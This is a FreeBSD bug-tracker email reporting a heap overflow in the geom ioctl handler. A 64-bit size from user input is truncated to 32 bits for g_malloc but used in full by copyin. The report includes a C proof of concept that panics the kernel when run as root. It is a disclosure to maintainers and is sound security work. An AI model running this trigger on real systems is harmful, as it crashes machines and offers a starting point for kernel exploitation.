[Bug 209113] Heap overflow in geom ioctl handler

[bugzilla-noreply at freebsd.org]

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=209113

            Bug ID: 209113
           Summary: Heap overflow in geom ioctl handler
           Product: Base System
           Version: 11.0-CURRENT
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Only Me
          Priority: ---
         Component: kern
          Assignee: freebsd-bugs at FreeBSD.org
          Reporter: cturt at hardenedbsd.org

There is a heap overflow in the `ioctl` handler for `geom`, which is
non-critical since it is only triggerable as `root`.

Essentially, there are no checks on the user supplied `req.narg` value. The
code uses this value to calculate a size by multiplying by `sizeof(struct
gctl_req_arg)`, and then calls `g_malloc` and `copyin`.

`g_malloc` treats its `size` parameter as an `int`:

static __inline void *g_malloc(int size, int flags)

So this size will be truncated to 32 bit, however the `copyin` call will use
the full 64 bit size.

PoC to trigger the bug, resulting in panic (must be run as `root`):

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <geom/geom_ctl.h>

int main(void) {
        int result;
        struct gctl_req req;
        int g;

        g = open("/dev/geom.ctl", O_RDONLY);
        if(g == -1) {
                printf("  [-] Couldn't open geom.ctl!\n");
                return 1;
        }

        req.error = malloc(0x100);
        req.lerror = 2;
        req.version = GCTL_VERSION;
        req.narg = 0x5555556;
        req.arg = malloc(0x4000);
        memset(req.arg, 'a', 0x4000);

        result = ioctl(g, GEOM_CTL, &req);
        printf("%d %d\n", result, errno);

        free(req.arg);

        return 0;
}

-- 
You are receiving this mail because:
You are the assignee for the bug.